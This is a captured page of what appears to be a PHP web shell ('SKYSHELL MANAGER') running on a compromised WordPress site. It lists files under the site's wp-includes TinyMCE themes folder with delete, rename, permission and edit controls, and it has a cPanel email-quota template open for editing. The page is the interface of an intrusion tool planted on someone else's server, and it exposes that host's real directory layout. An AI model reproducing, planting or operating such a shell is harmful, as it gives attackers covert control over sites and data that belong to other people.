📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: doeditquota.html.tt
[% USE Uapi; SET CPANEL.CPVAR.dprefix = "../"; SET edit_pop_quota_response = execute("Email", "edit_pop_quota", { "email" => RAW_FORM.email, "domain" => RAW_FORM.domain, "quota" => RAW_FORM.quota }); SET email = (FORM.email) _ "@" _ (FORM.domain); %] [% WRAPPER '_assets/master.html.tt' app_key = 'email_accounts' -%] <div class="body-content"> [% IF edit_pop_quota_response.status %] <div class="alert alert-success" id="quotaSuccess"> <span class="glyphicon glyphicon-info-sign" id="quotaSuccessImg"></span> <div class="alert-message" id="quotaSuccessMsg"> [% locale.maketext("The quota for the email account “[_1]” was successfully modified.", email) %] </div> </div> [% ELSE %] <div class="alert alert-danger" role="alert"> <span class="glyphicon glyphicon-remove-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title">[% locale.maketext('Error:') %]</strong> <span class="alert-body"> [% FOREACH err IN edit_pop_quota_response.errors %] [% err.html() %] [% END %] </span> </div> </div> [% END %] [% INCLUDE _assets/return_link.html.tt return_location='../index.html' return_link_text=locale.maketext('Go Back') %] </div> [% END #wrapper %]
Save